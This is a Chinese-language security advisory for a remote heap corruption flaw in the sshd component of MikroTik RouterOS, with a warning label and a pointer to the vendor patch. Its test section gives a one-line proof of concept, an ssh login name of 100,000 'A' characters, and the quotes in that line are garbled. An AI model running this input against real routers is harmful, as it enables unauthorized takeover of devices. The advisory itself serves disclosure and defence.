MikroTik RouterOS 'sshd'组件多个堆内存破坏漏洞
MikroTik RouterOS 'sshd'组件多个堆内存破坏漏洞
发布日期:2013-09-02
更新日期:2013-09-14
受影响系统:
MikroTik RouterOS
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 62110
MikroTik RouterOS 是路由操作系统,是基于Linux核心开发,兼容x86 PC的路由软件,将普通PC变为高性能路由器,现在已移植到MikroTik RouterBOARD硬件平台运行。
MikroTik RouterOS的sshd组件存在远程堆破坏漏洞,利用此漏洞可获取路由器设备的完全访问权限。
<*来源:Kingcope (kingcope@gmx.net)
链接:http://kingcope.wordpress.com/2013/09/02/mikrotik-routeros-5-and-6-sshd-remote-preauth-heap-corruption/
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
ssh -l`perl -e â??print â??Aâ? x 100000'` &lt;ip of mikrotik router&gt;
建议:
--------------------------------------------------------------------------------
厂商补丁:
MikroTik
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.mikrotik.com/download
评论暂时关闭